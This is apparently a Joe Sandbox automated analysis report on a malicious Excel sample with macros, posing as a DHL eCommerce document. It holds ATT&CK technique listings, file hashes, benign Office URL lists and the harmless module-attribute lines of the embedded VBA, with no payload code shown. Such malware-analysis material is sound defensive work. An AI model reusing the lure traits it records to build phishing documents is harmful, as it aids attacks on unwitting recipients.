Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsScripting11LSASS MemorySystem Information Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothJunk DataExploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Extra Window Memory Injection1Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
sample20211025-01.xls11%VirustotalBrowse

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
https://roaming.edog.0%URL Reputationsafe
https://cdn.entity.0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://ofcrecsvcapi-int.azurewebsites.net/0%URL Reputationsafe
https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h0%Avira URL Cloudsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://officeci.azurewebsites.net/api/0%URL Reputationsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://api.aadrm.com0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://api.addins.store.officeppe.com/addinstemplate0%Avira URL Cloudsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://ncus.contentsync.0%URL Reputationsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
https://wus2.contentsync.0%URL Reputationsafe
https://asgsmsproxyapi.azurewebsites.net/0%URL Reputationsafe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
https://ncus.pagecontentsync.0%URL Reputationsafe
https://skyapi.live.net/Activity/0%URL Reputationsafe
https://dataservice.o365filtering.com0%URL Reputationsafe
https://api.cortana.ai0%URL Reputationsafe
https://ovisualuiapp.azurewebsites.net/pbiagave/0%URL Reputationsafe

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
https://api.diagnosticssdf.office.comD996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drfalse
    high
    https://login.microsoftonline.com/D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drfalse
      high
      https://shell.suite.office.com:1443D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drfalse
        high
        https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorizeD996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drfalse
          high
          https://autodiscover-s.outlook.com/D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drfalse
            high
            https://roaming.edog.D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drfalse
            • URL Reputation: safe
            unknown
            https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=FlickrD996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drfalse
              high
              https://cdn.entity.D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drfalse
              • URL Reputation: safe
              unknown
              https://api.addins.omex.office.net/appinfo/queryD996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drfalse
                high
                https://clients.config.office.net/user/v1.0/tenantassociationkeyD996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drfalse
                  high
                  https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drfalse
                    high
                    https://powerlift.acompli.netD996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drfalse
                    • URL Reputation: safe
                    unknown
                    https://rpsticket.partnerservices.getmicrosoftkey.comD996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drfalse
                    • URL Reputation: safe
                    unknown
                    https://lookup.onenote.com/lookup/geolocation/v1D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drfalse
                      high
                      https://cortana.aiD996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drfalse
                      • URL Reputation: safe
                      unknown
                      https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechD996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drfalse
                        high
                        https://cloudfiles.onenote.com/upload.aspxD996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drfalse
                          high
                          https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFileD996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drfalse
                            high
                            https://entitlement.diagnosticssdf.office.comD996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drfalse
                              high
                              https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicyD996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drfalse
                                high
                                https://api.aadrm.com/D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drfalse
                                • URL Reputation: safe
                                unknown
                                https://ofcrecsvcapi-int.azurewebsites.net/D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drfalse
                                • URL Reputation: safe
                                unknown
                                https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPoliciesD996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drfalse
                                  high
                                  https://api.microsoftstream.com/api/D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drfalse
                                    high
                                    https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=ImmersiveD996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drfalse
                                      high
                                      https://cr.office.comD996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drfalse
                                        high
                                        https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;hD996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drfalse
                                        • Avira URL Cloud: safe
                                        low
                                        https://portal.office.com/account/?ref=ClientMeControlD996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drfalse
                                          high
                                          https://graph.ppe.windows.netD996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drfalse
                                            high
                                            https://res.getmicrosoftkey.com/api/redemptioneventsD996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drfalse
                                            • URL Reputation: safe
                                            unknown
                                            https://powerlift-frontdesk.acompli.netD996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drfalse
                                            • URL Reputation: safe
                                            unknown
                                            https://tasks.office.comD996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drfalse
                                              high
                                              https://officeci.azurewebsites.net/api/D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drfalse
                                              • URL Reputation: safe
                                              unknown
                                              https://sr.outlook.office.net/ws/speech/recognize/assistant/workD996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drfalse
                                                high
                                                https://store.office.cn/addinstemplateD996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drfalse
                                                • URL Reputation: safe
                                                unknown
                                                https://api.aadrm.comD996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drfalse
                                                • URL Reputation: safe
                                                unknown
                                                https://outlook.office.com/autosuggest/api/v1/init?cvid=D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drfalse
                                                  high
                                                  https://globaldisco.crm.dynamics.comD996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drfalse
                                                    high
                                                    https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechD996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drfalse
                                                      high
                                                      https://dev0-api.acompli.net/autodetectD996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      https://www.odwebp.svc.msD996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      https://api.powerbi.com/v1.0/myorg/groupsD996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drfalse
                                                        high
                                                        https://web.microsoftstream.com/video/D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drfalse
                                                          high
                                                          https://api.addins.store.officeppe.com/addinstemplateD996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://graph.windows.netD996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drfalse
                                                            high
                                                            https://dataservice.o365filtering.com/D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://officesetup.getmicrosoftkey.comD996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://analysis.windows.net/powerbi/apiD996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drfalse
                                                              high
                                                              https://prod-global-autodetect.acompli.net/autodetectD996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://outlook.office365.com/autodiscover/autodiscover.jsonD996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drfalse
                                                                high
                                                                https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-iosD996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drfalse
                                                                  high
                                                                  https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechD996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drfalse
                                                                    high
                                                                    https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.jsonD996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drfalse
                                                                      high
                                                                      https://ncus.contentsync.D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drfalse
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      https://onedrive.live.com/about/download/?windows10SyncClientInstalled=falseD996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drfalse
                                                                        high
                                                                        https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drfalse
                                                                          high
                                                                          http://weather.service.msn.com/data.aspxD996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drfalse
                                                                            high
                                                                            https://apis.live.net/v5.0/D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drfalse
                                                                            • URL Reputation: safe
                                                                            unknown
                                                                            https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asksD996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drfalse
                                                                              high
                                                                              https://word.uservoice.com/forums/304948-word-for-ipad-iphone-iosD996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drfalse
                                                                                high
                                                                                https://autodiscover-s.outlook.com/autodiscover/autodiscover.xmlD996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drfalse
                                                                                  high
                                                                                  https://management.azure.comD996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drfalse
                                                                                    high
                                                                                    https://outlook.office365.comD996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drfalse
                                                                                      high
                                                                                      https://wus2.contentsync.D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drfalse
                                                                                      • URL Reputation: safe
                                                                                      unknown
                                                                                      https://incidents.diagnostics.office.comD996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drfalse
                                                                                        high
                                                                                        https://clients.config.office.net/user/v1.0/iosD996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drfalse
                                                                                          high
                                                                                          https://insertmedia.bing.office.net/odc/insertmediaD996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drfalse
                                                                                            high
                                                                                            https://o365auditrealtimeingestion.manage.office.comD996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drfalse
                                                                                              high
                                                                                              https://outlook.office365.com/api/v1.0/me/ActivitiesD996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drfalse
                                                                                                high
                                                                                                https://api.office.netD996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drfalse
                                                                                                  high
                                                                                                  https://incidents.diagnosticssdf.office.comD996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drfalse
                                                                                                    high
                                                                                                    https://asgsmsproxyapi.azurewebsites.net/D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drfalse
                                                                                                    • URL Reputation: safe
                                                                                                    unknown
                                                                                                    https://clients.config.office.net/user/v1.0/android/policiesD996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drfalse
                                                                                                      high
                                                                                                      https://entitlement.diagnostics.office.comD996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drfalse
                                                                                                        high
                                                                                                        https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.jsonD996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drfalse
                                                                                                          high
                                                                                                          https://substrate.office.com/search/api/v2/initD996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drfalse
                                                                                                            high
                                                                                                            https://outlook.office.com/D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drfalse
                                                                                                              high
                                                                                                              https://storage.live.com/clientlogs/uploadlocationD996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drfalse
                                                                                                                high
                                                                                                                https://outlook.office365.com/D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drfalse
                                                                                                                  high
                                                                                                                  https://webshell.suite.office.comD996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drfalse
                                                                                                                    high
                                                                                                                    https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDriveD996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drfalse
                                                                                                                      high
                                                                                                                      https://substrate.office.com/search/api/v1/SearchHistoryD996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drfalse
                                                                                                                        high
                                                                                                                        https://management.azure.com/D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drfalse
                                                                                                                          high
                                                                                                                          https://login.windows.net/common/oauth2/authorizeD996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drfalse
                                                                                                                            high
                                                                                                                            https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFileD996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drfalse
                                                                                                                            • URL Reputation: safe
                                                                                                                            unknown
                                                                                                                            https://graph.windows.net/D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drfalse
                                                                                                                              high
                                                                                                                              https://api.powerbi.com/beta/myorg/importsD996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drfalse
                                                                                                                                high
                                                                                                                                https://devnull.onenote.comD996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drfalse
                                                                                                                                  high
                                                                                                                                  https://ncus.pagecontentsync.D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  unknown
                                                                                                                                  https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.jsonD996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drfalse
                                                                                                                                    high
                                                                                                                                    https://messaging.office.com/D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drfalse
                                                                                                                                      high
                                                                                                                                      https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFileD996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drfalse
                                                                                                                                        high
                                                                                                                                        https://augloop.office.com/v2D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drfalse
                                                                                                                                          high
                                                                                                                                          https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=BingD996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drfalse
                                                                                                                                            high
                                                                                                                                            https://skyapi.live.net/Activity/D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            unknown
                                                                                                                                            https://clients.config.office.net/user/v1.0/macD996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drfalse
                                                                                                                                              high
                                                                                                                                              https://dataservice.o365filtering.comD996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              unknown
                                                                                                                                              https://api.cortana.aiD996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              unknown
                                                                                                                                              https://onedrive.live.comD996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drfalse
                                                                                                                                                high
                                                                                                                                                https://ovisualuiapp.azurewebsites.net/pbiagave/D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drfalse
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                unknown

                                                                                                                                                Contacted IPs

                                                                                                                                                No contacted IP infos

                                                                                                                                                General Information

                                                                                                                                                Joe Sandbox Version:33.0.0 White Diamond
                                                                                                                                                Analysis ID:508537
                                                                                                                                                Start date:25.10.2021
                                                                                                                                                Start time:10:49:32
                                                                                                                                                Joe Sandbox Product:CloudBasic
                                                                                                                                                Overall analysis duration:0h 3m 56s
                                                                                                                                                Hypervisor based Inspection enabled:false
                                                                                                                                                Report type:full
                                                                                                                                                Sample file name:sample20211025-01.xls
                                                                                                                                                Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                Run name:Potential for more IOCs and behavior
                                                                                                                                                Number of analysed new started processes analysed:24
                                                                                                                                                Number of new started drivers analysed:0
                                                                                                                                                Number of existing processes analysed:0
                                                                                                                                                Number of existing drivers analysed:0
                                                                                                                                                Number of injected processes analysed:0
                                                                                                                                                Technologies:
                                                                                                                                                • HCA enabled
                                                                                                                                                • EGA enabled
                                                                                                                                                • HDC enabled
                                                                                                                                                • AMSI enabled
                                                                                                                                                Analysis Mode:default
                                                                                                                                                Analysis stop reason:Timeout
                                                                                                                                                Detection:MAL
                                                                                                                                                Classification:mal68.bank.expl.winXLS@1/1@0/0
                                                                                                                                                EGA Information:Failed
                                                                                                                                                HDC Information:Failed
                                                                                                                                                HCA Information:
                                                                                                                                                • Successful, ratio: 100%
                                                                                                                                                • Number of executed functions: 0
                                                                                                                                                • Number of non-executed functions: 0
                                                                                                                                                Cookbook Comments:
                                                                                                                                                • Adjust boot time
                                                                                                                                                • Enable AMSI
                                                                                                                                                • Found application associated with file extension: .xls
                                                                                                                                                • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                • Attach to Office via COM
                                                                                                                                                • Active Picture Object
                                                                                                                                                • Active Picture Object
                                                                                                                                                • Scroll down
                                                                                                                                                • Close Viewer
                                                                                                                                                Warnings:
                                                                                                                                                Show All
                                                                                                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                                                                                                                • Excluded IPs from analysis (whitelisted): 23.211.4.86, 52.109.20.75, 52.109.12.21, 52.109.88.37, 20.82.209.183, 40.91.112.76, 20.54.110.249, 40.112.88.60, 80.67.82.235, 80.67.82.211, 20.50.102.62
                                                                                                                                                • Excluded domains from analysis (whitelisted): displaycatalog-rp-uswest.md.mp.microsoft.com.akadns.net, prod-w.nexus.live.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, wus2-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, a1449.dscg2.akamai.net, arc.msn.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, nexus.officeapps.live.com, arc.trafficmanager.net, consumer-displaycatalogrp-aks2aks-uswest.md.mp.microsoft.com.akadns.net, officeclient.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, prod.configsvc1.live.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, e1723.g.akamaiedge.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, ris.api.iris.microsoft.com, config.officeapps.live.com, us.configsvc1.live.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                                                                                                                • Not all processes where analyzed, report is missing behavior information

                                                                                                                                                Simulations

                                                                                                                                                Behavior and APIs

                                                                                                                                                No simulations

                                                                                                                                                Joe Sandbox View / Context

                                                                                                                                                IPs

                                                                                                                                                No context

                                                                                                                                                Domains

                                                                                                                                                No context

                                                                                                                                                ASN

                                                                                                                                                No context

                                                                                                                                                JA3 Fingerprints

                                                                                                                                                No context

                                                                                                                                                Dropped Files

                                                                                                                                                No context

                                                                                                                                                Created / dropped Files

                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\D996E009-EEFC-4DD9-8747-5D20986EEBA9
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):139130
                                                                                                                                                Entropy (8bit):5.358455742213455
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:1536:NcQIfgxrBdA3gBwfnQ9DQW+zBY34Fi7nXboOidXVE6LWmE9:XWQ9DQW+zzXaH
                                                                                                                                                MD5:DF73792F5988E451A9F9A3FFD4853113
                                                                                                                                                SHA1:97AB67B8DAE208FFBF7B4ECE1B590D439B86FF95
                                                                                                                                                SHA-256:6F24C0FFC4CC4AB3CD7B6FD668F23591CE6FE680BD92EA41660358E956AD7142
                                                                                                                                                SHA-512:13072E1620D7D6A892C88588BC5EF48C4EB41D3C013DC2DED6889A6D66802BD05A55B83A9C503DD2566571B1B43F8FC849240536A57C50F61D0A01D16497E3C8
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:low
                                                                                                                                                Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-10-25T08:50:24">.. Build: 16.0.14618.30527-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:

                                                                                                                                                Static File Info

                                                                                                                                                General

                                                                                                                                                File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Create Time/Date: Mon Oct 25 08:52:46 2021, Last Saved Time/Date: Mon Oct 25 08:52:48 2021, Security: 0, Author: DHL eCommerce
                                                                                                                                                Entropy (8bit):5.70676744685002
                                                                                                                                                TrID:
                                                                                                                                                • Microsoft Excel sheet (30009/1) 78.94%
                                                                                                                                                • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                                                                                                                                                File name:sample20211025-01.xls
                                                                                                                                                File size:57344
                                                                                                                                                MD5:2172d539dfc31f78f87363c9837fc788
                                                                                                                                                SHA1:a0af38a44615a87108f842cf32f5b5f8b289fe43
                                                                                                                                                SHA256:7116c93e85891626185692c325a7c648bf2f2effb5c05582f77a18144b620164
                                                                                                                                                SHA512:3ac78cb0976a0125e1b05b36bdbd347827d07ed840dddc4e20c325fde80bef5bbb25f558d23424a93ad97c4f980a85af45bfd7a039d711c4eb0f7bbf4389ac79
                                                                                                                                                SSDEEP:1536:GsQlYkEIbSkKBEqEXPgsRZmbaoFhZhR0cixIHm0w05bQK/64f6xMmsi0wW6l:GhlYkEIuPm3fNRZmbaoFhZhR0cixIHmp
                                                                                                                                                File Content Preview:........................>...................................F..................................................................................................................................................................................................

                                                                                                                                                File Icon

                                                                                                                                                Icon Hash:74ecd4c6c3c6c4d8

                                                                                                                                                Static OLE Info

                                                                                                                                                General

                                                                                                                                                Document Type:OLE
                                                                                                                                                Number of OLE Files:1

                                                                                                                                                OLE File "sample20211025-01.xls"

                                                                                                                                                Indicators

                                                                                                                                                Has Summary Info:True
                                                                                                                                                Application Name:unknown
                                                                                                                                                Encrypted Document:False
                                                                                                                                                Contains Word Document Stream:False
                                                                                                                                                Contains Workbook/Book Stream:True
                                                                                                                                                Contains PowerPoint Document Stream:False
                                                                                                                                                Contains Visio Document Stream:False
                                                                                                                                                Contains ObjectPool Stream:
                                                                                                                                                Flash Objects Count:
                                                                                                                                                Contains VBA Macros:True

                                                                                                                                                Summary

                                                                                                                                                Code Page:1252
                                                                                                                                                Author:DHL eCommerce
                                                                                                                                                Create Time:2021-10-25 07:52:46.061000
                                                                                                                                                Last Saved Time:2021-10-25 07:52:48
                                                                                                                                                Security:0

                                                                                                                                                Document Summary

                                                                                                                                                Document Code Page:1252
                                                                                                                                                Thumbnail Scaling Desired:False
                                                                                                                                                Company:
                                                                                                                                                Contains Dirty Links:False
                                                                                                                                                Shared Document:False
                                                                                                                                                Changed Hyperlinks:False
                                                                                                                                                Application Version:1048576

                                                                                                                                                Streams with VBA

                                                                                                                                                VBA File Name: Foglio1, Stream Size: 992
                                                                                                                                                General
                                                                                                                                                Stream Path:_VBA_PROJECT_CUR/VBA/Foglio1
                                                                                                                                                VBA File Name:Foglio1
                                                                                                                                                Stream Size:992
                                                                                                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                Data Raw:01 16 03 00 00 f0 00 00 00 d2 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff d9 02 00 00 2d 03 00 00 00 00 00 00 01 00 00 00 db f6 f5 9d 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                VBA Code
                                                                                                                                                Attribute VB_Name = "Foglio1"
                                                                                                                                                Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                                                                                                                Attribute VB_GlobalNameSpace = False
                                                                                                                                                Attribute VB_Creatable = False
                                                                                                                                                Attribute VB_PredeclaredId = True
                                                                                                                                                Attribute VB_Exposed = True
                                                                                                                                                Attribute VB_TemplateDerived = False
                                                                                                                                                Attribute VB_Customizable = True
                                                                                                                                                VBA File Name: Questa_cartella_di_lavoro, Stream Size: 5922
                                                                                                                                                General
                                                                                                                                                Stream Path:_VBA_PROJECT_CUR/VBA/Questa_cartella_di_lavoro
                                                                                                                                                VBA File Name:Questa_cartella_di_lavoro
                                                                                                                                                Stream Size:5922
                                                                                                                                                Data ASCII:. . . . . . . . . 2 . . . . . . . . . . . ` . . . n . . . . . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . p . . . . . . . . . . ~ . H . . [ . . . . . . . . . . . . . . . . . . . . F . . . . . . . . . . . . . . . . . . . . . D . . . W . M . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . D . . . W . M . . . = . . . . . . . . . ~ . H . . [ . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . .
